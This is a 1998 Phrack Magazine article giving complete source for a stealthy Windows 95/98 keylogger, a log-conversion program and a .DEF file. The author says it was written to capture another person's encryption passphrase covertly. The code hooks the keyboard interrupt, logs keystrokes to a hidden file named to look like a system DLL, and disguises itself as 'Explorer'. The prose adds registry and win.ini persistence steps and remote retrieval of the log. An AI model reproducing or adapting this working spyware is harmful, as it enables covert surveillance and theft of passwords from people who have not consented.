| ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 07 of 15 | |
| -------------------------[ A Stealthy Windows Keylogger | |
| --------[ markj8@usa.net | |
| I recently felt the need to acquire some data being typed into Windows95 | |
| machines on a small TCP-IP network. I had occasional physical access to the | |
| machines and I knew the remote administration password, but the files were | |
| being saved in BestCryptNP volumes, the passphrase for which I didn't know... | |
| I searched the Net as best I could for a suitable keylogging program that | |
| would allow me to capture the passphrase without being noticed, but all I | |
| could find was I big boggy thing written in visual basic that insisted on | |
| opening a window. I decided to write my own. I wanted to write it as a VXD | |
| because they run at Privilege Level 0 and can do just about ANYTHING. I soon | |
| gave up on this idea because I couldn't acquire the correct tools and certainly | |
| couldn't afford to buy them. | |
| While browsing through the computer section of my local public library one | |
| day I noticed a rather thin book called "WINDOWS ASSEMBLY LANGUAGE and SYSTEMS | |
| PROGRAMMING" by Barry Kauler, (ISBN 0 13 020207 X) c 1993. A quick flick | |
| through the Table of Contents revealed "Chapter 10: Real-Time Events, Enhanced | |
| Mode Hardware Interrupts". I immediately borrowed the book and photocopied | |
| it (Sorry about the royalties Barry). As I read chapter 10 I realized that | |
| all I needed was a small 16 bit Windows program running as a normal user | |
| process to capture every keystroke typed into windows. The only caveat was | |
| that keystrokes typed into DOS boxes wouldn't be captured. Big deal. I could | |
| live without that. I was stunned to discover that all user programs in Windows | |
| share a single Interrupt Descriptor Table (IDT). This implies that if one | |
| user program patches a vector in the IDT, then all other programs are | |
| immediately affected. | |
| The only tool I had for generating windows executables was Borland C Ver | |
| 2.0 which makes small and cute windows 3.0 EXE's, so that's what I used. I | |
| have tested it on Windows for Workgroups 3.11, Windows 95 OSR2, and Windows 98 | |
| beta 3. It will probably work on Windows 3.x as well. | |
| As supplied, it will create a hidden file in the \WINDOWS\SYSTEM directory | |
| called POWERX.DLL and record all keystrokes into it using the same encoding | |
| scheme as Doc Cypher's KEYTRAP3.COM program for DOS. This means that you can | |
| use the same conversion program, CONVERT3.C, to convert the raw scancodes in | |
| the log file to readable ASCII. I have included a slightly "improved" version | |
| of CONVERT3.C with a couple of bugs fixed. I contemplated incorporating the | |
| functionality of CONVERT3 into W95Klog, but decided that logging scancodes | |
| was "safer" that logging plain ASCII. If the log file is larger that 2 | |
| megabytes when the program starts, it will be deleted and re-created with | |
| length zero. When you press CTRL-ALT-DEL (in windows95/98) to look at the | |
| Task List, W95Klog will show up as "Explorer". You can change this by editing | |
| the .DEF file and recompiling, or by HEX Editing the .EXE file. If anyone | |
| knows how to stop a user program from showing on this list please tell me. | |
| To cause the target machine to run W95Klog every time it starts Windows | |
| you can: | |
| 1) Edit win.ini, [windows] section to say run=WHLPFFS.EXE or some such | |
| confusing name :) Warning! This will cause a nasty error message if | |
| WHLPFFS.EXE can't be found. This method has the advantage of being able to be | |
| performed over the network via "remote administration" without the need for | |
| both computers to be running "remote registry service". | |
| 2) Edit the registry key: (Win95/98) | |
| `HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run` and create | |
| a new key called whatever you like with a string value of "WHLPFFS.EXE" or | |
| whatever. This is my preferred method because it is less likely to be stumbled | |
| upon by the average user and windows continues without complaint if the | |
| executable can't be found. The log file can be retrieved via the network even | |
| when it is still open for writing by the logging program. This is very | |
| convenient ;). | |
| <++> EX/win95log/convert.c | |
| // | |
| // Convert v3.0 | |
| // Keytrap logfile converter. | |
| // By dcypher <dcypher@mhv.net> | |
| // MSVC++1.52 (Or Borland C 1.01, 2.0 ...) | |
| // Released: 8/8/95 | |
| // | |
| // Scancodes above 185(0xB9) are converted to "<UK>", UnKnown. | |
| // | |
| #include <stdio.h> | |
| #define MAXKEYS 256 | |
| #define WS 128 | |
| const char *keys[MAXKEYS]; | |
| void main(int argc,char *argv[]) | |
| { | |
| FILE *stream1; | |
| FILE *stream2; | |
| unsigned int Ldata,Nconvert=0,Yconvert=0; | |
| char logf_name[100],outf_name[100]; | |
| // | |
| // HERE ARE THE KEY ASSIGNMENTS !! | |
| // | |
| // You can change them to anything you want. | |
| // If any of the key assignments are wrong, please let | |
| // me know. I havn't checked all of them, but it looks ok. | |
| // | |
| // v--- Scancodes logged by the keytrap TSR | |
| // v--- Converted to the string here | |
| keys[1] = "<uk>"; | |
| keys[2] = "1"; | |
| keys[3] = "2"; | |
| keys[4] = "3"; | |
| keys[5] = "4"; | |
| keys[6] = "5"; | |
| keys[7] = "6"; | |
| keys[8] = "7"; | |
| keys[9] = "8"; | |
| keys[10] = "9"; | |
| keys[11] = "0"; | |
| keys[12] = "-"; | |
| keys[13] = "="; | |
| keys[14] = "<bsp>"; | |
| keys[15] = "<tab>"; | |
| keys[16] = "q"; | |
| keys[17] = "w"; | |
| keys[18] = "e"; | |
| keys[19] = "r"; | |
| keys[20] = "t"; | |
| keys[21] = "y"; | |
| keys[22] = "u"; | |
| keys[23] = "i"; | |
| keys[24] = "o"; | |
| keys[25] = "p"; | |
| keys[26] = "["; /* = ^Z Choke! */ | |
| keys[27] = "]"; | |
| keys[28] = "<ret>"; | |
| keys[29] = "<ctrl>"; | |
| keys[30] = "a"; | |
| keys[31] = "s"; | |
| keys[32] = "d"; | |
| keys[33] = "f"; | |
| keys[34] = "g"; | |
| keys[35] = "h"; | |
| keys[36] = "j"; | |
| keys[37] = "k"; | |
| keys[38] = "l"; | |
| keys[39] = ";"; | |
| keys[40] = "'"; | |
| keys[41] = "`"; | |
| keys[42] = "<LEFT SHIFT>"; // left shift - not logged by the tsr | |
| keys[43] = "\\"; // and not converted | |
| keys[44] = "z"; | |
| keys[45] = "x"; | |
| keys[46] = "c"; | |
| keys[47] = "v"; | |
| keys[48] = "b"; | |
| keys[49] = "n"; | |
| keys[50] = "m"; | |
| keys[51] = ","; | |
| keys[52] = "."; | |
| keys[53] = "/"; | |
| keys[54] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr | |
| keys[55] = "*"; // and not converted | |
| keys[56] = "<alt>"; | |
| keys[57] = " "; | |
| // now show with shift key | |
| // the TSR adds 128 to the scancode to show shift/caps | |
| keys[1+WS] = "["; /* was "<unknown>" but now fixes ^Z problem */ | |
| keys[2+WS] = "!"; | |
| keys[3+WS] = "@"; | |
| keys[4+WS] = "#"; | |
| keys[5+WS] = "$"; | |
| keys[6+WS] = "%"; | |
| keys[7+WS] = "^"; | |
| keys[8+WS] = "&"; | |
| keys[9+WS] = "*"; | |
| keys[10+WS] = "("; | |
| keys[11+WS] = ")"; | |
| keys[12+WS] = "_"; | |
| keys[13+WS] = "+"; | |
| keys[14+WS] = "<shift+bsp>"; | |
| keys[15+WS] = "<shift+tab>"; | |
| keys[16+WS] = "Q"; | |
| keys[17+WS] = "W"; | |
| keys[18+WS] = "E"; | |
| keys[19+WS] = "R"; | |
| keys[20+WS] = "T"; | |
| keys[21+WS] = "Y"; | |
| keys[22+WS] = "U"; | |
| keys[23+WS] = "I"; | |
| keys[24+WS] = "O"; | |
| keys[25+WS] = "P"; | |
| keys[26+WS] = "{"; | |
| keys[27+WS] = "}"; | |
| keys[28+WS] = "<shift+ret>"; | |
| keys[29+WS] = "<shift+ctrl>"; | |
| keys[30+WS] = "A"; | |
| keys[31+WS] = "S"; | |
| keys[32+WS] = "D"; | |
| keys[33+WS] = "F"; | |
| keys[34+WS] = "G"; | |
| keys[35+WS] = "H"; | |
| keys[36+WS] = "J"; | |
| keys[37+WS] = "K"; | |
| keys[38+WS] = "L"; | |
| keys[39+WS] = ":"; | |
| keys[40+WS] = "\""; | |
| keys[41+WS] = "~"; | |
| keys[42+WS] = "<LEFT SHIFT>"; // left shift - not logged by the tsr | |
| keys[43+WS] = "|"; // and not converted | |
| keys[44+WS] = "Z"; | |
| keys[45+WS] = "X"; | |
| keys[46+WS] = "C"; | |
| keys[47+WS] = "V"; | |
| keys[48+WS] = "B"; | |
| keys[49+WS] = "N"; | |
| keys[50+WS] = "M"; | |
| keys[51+WS] = "<"; | |
| keys[52+WS] = ">"; | |
| keys[53+WS] = "?"; | |
| keys[54+WS] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr | |
| keys[55+WS] = "<shift+*>"; // and not converted | |
| keys[56+WS] = "<shift+alt>"; | |
| keys[57+WS] = " "; | |
| printf("\n"); | |
| printf("Convert v3.0\n"); | |
| // printf("Keytrap logfile converter.\n"); | |
| // printf("By dcypher <dcypher@mhv.net>\n\n"); | |
| printf("Usage: CONVERT infile outfile\n"); | |
| printf("\n"); | |
| if (argc==3) | |
| { | |
| strcpy(logf_name,argv[1]); | |
| strcpy(outf_name,argv[2]); | |
| } | |
| else | |
| { | |
| printf("Enter infile name: "); | |
| scanf("%99s",&logf_name); | |
| printf("Enter outfile name: "); | |
| scanf("%99s",&outf_name); | |
| printf("\n"); | |
| } | |
| stream1=fopen(logf_name,"rb"); | |
| stream2=fopen(outf_name,"a+b"); | |
| if (stream1==NULL || stream2==NULL) | |
| { | |
| if (stream1==NULL) | |
| printf("Error opening: %s\n\a",logf_name); | |
| else | |
| printf("Error opening: %s\n\a",outf_name); | |
| } | |
| else | |
| { | |
| fseek(stream1,0L,SEEK_SET); | |
| printf("Reading data from: %s\n",logf_name); | |
| printf("Appending information to..: %s\n",outf_name); | |
| while (feof(stream1)==0) | |
| { | |
| Ldata=fgetc(stream1); | |
| if (Ldata>0 | |
| && Ldata<186) | |
| { | |
| if (Ldata==28 || Ldata==28+WS) | |
| { | |
| fputs(keys[Ldata],stream2); | |
| fputc(0x0A,stream2); | |
| fputc(0x0D,stream2); | |
| Yconvert++; | |
| } | |
| else | |
| fputs(keys[Ldata],stream2); | |
| Yconvert++; | |
| } | |
| else | |
| { | |
| fputs("<UK>",stream2); | |
| Nconvert++; | |
| } | |
| } | |
| } | |
| fflush(stream2); | |
| printf("\n\n"); | |
| printf("Data converted....: %i\n",Yconvert); | |
| printf("Data not converted: %i\n",Nconvert); | |
| printf("\n"); | |
| printf("Closeing infile: %s\n",logf_name); | |
| printf("Closeing outfile: %s\n",outf_name); | |
| fclose(stream1); | |
| fclose(stream2); | |
| } | |
| <--> | |
| <++> EX/win95log/W95Klog.c | |
| /* | |
| * W95Klog.C Windows stealthy keylogging program | |
| */ | |
| /* | |
| * This will ONLY compile with BORLANDC V2.0 small model. | |
| * For other compilers you will have to change newint9() | |
| * and who knows what else :) | |
| * | |
| * Captures ALL interesting keystrokes from WINDOWS applications | |
| * but NOT from DOS boxes. | |
| * Tested OK on WFW 3.11, Win95 OSR2 and Win98 Beta 3. | |
| */ | |
| #include <windows.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <dos.h> | |
| //#define LOGFILE "~473C96.TMP" //Name of log file in WINDOWS\TEMP | |
| #define LOGFILE "POWERX.DLL" //Name of log file in WINDOWS\SYSTEM | |
| #define LOGMAXSIZE 2097152 //Max size of log file (2Megs) | |
| #define HIDDEN 2 | |
| #define SEEK_END 2 | |
| #define NEWVECT 018h // "Unused" int that is used to call old | |
| // int 9 keyboard routine. | |
| // Was used for ROMBASIC on XT's | |
| // Change it if you get a conflict with some | |
| // very odd program. Try 0f9h. | |
| /************* Global Variables in DATA SEGment ****************/ | |
| HWND hwnd; // used by newint9() | |
| unsigned int offsetint; // old int 9 offset | |
| unsigned int selectorint; // old int 9 selector | |
| unsigned char scancode; // scan code from keyboard | |
| //WndProc | |
| char sLogPath[160]; | |
| int hLogFile; | |
| long lLogPos; | |
| char sLogBuf[10]; | |
| //WinMain | |
| char szAppName[]="Explorer"; | |
| MSG msg; | |
| WNDCLASS wndclass; | |
| /***************************************************************/ | |
| // | |
| //__________________________ | |
| void interrupt newint9(void) //This is the new int 9 (keyboard) code | |
| // It is a hardware Interrupt Service Routine. (ISR) | |
| { | |
| scancode=inportb(0x60); | |
| if((scancode<0x40)&&(scancode!=0x2a)) { | |
| if(peekb(0x0040, 0x0017)&0x40) { //if CAPSLOCK is active | |
| // Now we have to flip UPPER/lower state of A-Z only! 16-25,30-38,44-50 | |
| if(((scancode>15)&&(scancode<26))||((scancode>29)&&(scancode<39))|| | |
| ((scancode>43)&&(scancode<51))) //Phew! | |
| scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program | |
| }//if CAPSLOCK | |
| if(peekb(0x0040, 0x0017)&3) //if any shift key is pressed... | |
| scancode^=128; //bit 7 indicates SHIFT state to CONVERT.C program | |
| if(scancode==26) //Nasty ^Z bug in convert program | |
| scancode=129; //New code for "[" | |
| //Unlike other Windows functions, an application may call PostMessage | |
| // at the hardwareinterrupt level. (Thankyou Micr$oft!) | |
| PostMessage(hwnd, WM_USER, scancode, 0L); //Send scancode to WndProc() | |
| }//if scancode in range | |
| asm { //This is very compiler specific, & kinda ugly! | |
| pop bp | |
| pop di | |
| pop si | |
| pop ds | |
| pop es | |
| pop dx | |
| pop cx | |
| pop bx | |
| pop ax | |
| int NEWVECT // Call the original int 9 Keyboard routine | |
| iret // and return from interrupt | |
| } | |
| }//end newint9 | |
| //This is the "callback" function that handles all messages to our "window" | |
| //_____________________________________________________________________ | |
| long FAR PASCAL WndProc(HWND hwnd,WORD message,WORD wParam,LONG lParam) | |
| { | |
| //asm int 3; //For Soft-ice debugging | |
| //asm int 18h; //For Soft-ice debugging | |
| switch(message) { | |
| case WM_CREATE: // hook the keyboard hardware interupt | |
| asm { | |
| pusha | |
| push es | |
| push ds | |
| // Now get the old INT 9 vector and save it... | |
| mov al,9 | |
| mov ah,35h // into ES:BX | |
| int 21h | |
| push es | |
| pop ax | |
| mov offsetint,bx // save old vector in data segment | |
| mov selectorint,ax // / | |
| mov dx,OFFSET newint9 // This is an OFFSET in the CODE segment | |
| push cs | |
| pop ds // New vector in DS:DX | |
| mov al,9 | |
| mov ah,25h | |
| int 21h // Set new int 9 vector | |
| pop ds // get data seg for this program | |
| push ds | |
| // now hook unused vector | |
| // to call old int 9 routine | |
| mov dx,offsetint | |
| mov ax,selectorint | |
| mov ds,ax | |
| mov ah,25h | |
| mov al,NEWVECT | |
| int 21h | |
| // Installation now finished | |
| pop ds | |
| pop es | |
| popa | |
| } // end of asm | |
| //Get path to WINDOWS directory | |
| if(GetWindowsDirectory(sLogPath,150)==0) return 0; | |
| //Put LOGFILE on end of path | |
| strcat(sLogPath,"\\SYSTEM\\"); | |
| strcat(sLogPath,LOGFILE); | |
| do { | |
| // See if LOGFILE exists | |
| hLogFile=_lopen(sLogPath,OF_READ); | |
| if(hLogFile==-1) { // We have to Create it | |
| hLogFile=_lcreat(sLogPath,HIDDEN); | |
| if(hLogFile==-1) return 0; //Die quietly if can't create LOGFILE | |
| } | |
| _lclose(hLogFile); | |
| // Now it exists and (hopefully) is hidden.... | |
| hLogFile=_lopen(sLogPath,OF_READWRITE); //Open for business! | |
| if(hLogFile==-1) return 0; //Die quietly if can't open LOGFILE | |
| lLogPos=_llseek(hLogFile,0L,SEEK_END); //Seek to the end of the file | |
| if(lLogPos==-1) return 0; //Die quietly if can't seek to end | |
| if(lLogPos>LOGMAXSIZE) { //Let's not fill the harddrive... | |
| _lclose(hLogFile); | |
| _chmod(sLogPath,1,0); | |
| if(unlink(sLogPath)) return 0; //delete or die | |
| }//if file too big | |
| } while(lLogPos>LOGMAXSIZE); | |
| break; | |
| case WM_USER: // A scan code.... | |
| *sLogBuf=(char)wParam; | |
| _write(hLogFile,sLogBuf,1); | |
| break; | |
| case WM_ENDSESSION: // Is windows "restarting" ? | |
| case WM_DESTROY: // Or are we being killed ? | |
| asm{ | |
| push dx | |
| push ds | |
| mov dx,offsetint | |
| mov ds,selectorint | |
| mov ax,2509h | |
| int 21h //point int 09 vector back to old | |
| pop ds | |
| pop dx | |
| } | |
| _lclose(hLogFile); | |
| PostQuitMessage(0); | |
| return(0); | |
| } //end switch | |
| //This handles all the messages that we don't want to know about | |
| return DefWindowProc(hwnd,message,wParam,lParam); | |
| }//end WndProc | |
| /**********************************************************/ | |
| int PASCAL WinMain (HANDLE hInstance, HANDLE hPrevInstance, | |
| LPSTR lpszCmdParam, int nCmdShow) | |
| { | |
| if (!hPrevInstance) { //If there is no previous instance running... | |
| wndclass.style = CS_HREDRAW | CS_VREDRAW; | |
| wndclass.lpfnWndProc = WndProc; //function that handles messages | |
| // for this window class | |
| wndclass.cbClsExtra = 0; | |
| wndclass.cbWndExtra = 0; | |
| wndclass.hInstance = hInstance; | |
| wndclass.hIcon = NULL; | |
| wndclass.hCursor = NULL; | |
| wndclass.hbrBackground = NULL; | |
| wndclass.lpszClassName = szAppName; | |
| RegisterClass (&wndclass); | |
| hwnd = CreateWindow(szAppName, //Create a window | |
| szAppName, //window caption | |
| WS_OVERLAPPEDWINDOW, //window style | |
| CW_USEDEFAULT, //initial x position | |
| CW_USEDEFAULT, //initial y position | |
| CW_USEDEFAULT, //initial x size | |
| CW_USEDEFAULT, //initial y size | |
| NULL, //parent window handle | |
| NULL, //Window Menu handle | |
| hInstance, //program instance handle | |
| NULL); //creation parameters | |
| //ShowWindow(hwnd,nCmdShow); //We don't want no | |
| //UpdateWindow(hwnd); // stinking window! | |
| while (GetMessage(&msg,NULL,0,0)) { | |
| TranslateMessage(&msg); | |
| DispatchMessage(&msg); | |
| } | |
| }//if no previous instance of this program is running... | |
| return msg.wParam; //Program terminates here after falling out | |
| } //End of WinMain of the while() loop. | |
| <--> | |
| <++> EX/win95log/W95KLOG.DEF | |
| ;NAME is what shows in CTRL-ALT-DEL Task list... hmmmm | |
| NAME Explorer | |
| DESCRIPTION 'Explorer' | |
| EXETYPE WINDOWS | |
| CODE PRELOAD FIXED | |
| DATA PRELOAD FIXED SHARED | |
| HEAPSIZE 2048 | |
| STACKSIZE 8096 | |
| <--> | |
| <++> EX/win95log/W95KLOG.EXE.uue | |
| begin 600 W95KLOG.EXE | |
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